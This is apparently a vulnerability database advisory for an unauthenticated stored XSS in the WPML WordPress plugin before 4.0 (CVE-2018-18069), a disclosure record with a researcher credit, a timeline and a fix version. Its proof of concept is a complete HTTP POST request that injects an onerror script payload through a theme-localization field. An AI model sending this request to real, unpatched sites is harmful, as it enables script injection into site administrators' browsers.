WordPress Plugin Vulnerabilities

WPML < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

Description

The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1

icl_post_action=save_theme_localization&locale_file_name_en="><img src=x onerror=alert(1)>

Affects Plugins

Plugin icon
sitepress-multilingual-cms
Fixed in 4.0

References

CVE
CVE-2018-18069

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Rahul Pratap Singh
Verified
No
WPVDB ID
024b43d3-1e73-47f1-81d2-ab15a6c7b0fd

Timeline

Publicly Published
2018-10-08 (about 5 years ago)
Added
2019-08-23 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)

Other

Published
Title
Published
2023-09-21
Title
Media Library Assistant < 3.11 - Contributor+ Stored XSS
Published
2014-08-01
Title
VideoJS - Cross-Site Scripting (XSS)
Published
2020-02-27
Title
10Web Map Builder for Google Maps < 1.0.64 - Unauthenticated Stored XSS via Plugin Settings Change
Published
2014-04-28
Title
Keyword Strategy Internal Links <= 2.0 - XSS
Published
2023-05-25
Title
Google Map Shortcode <= 3.1.2 - Contributor+ Stored XSS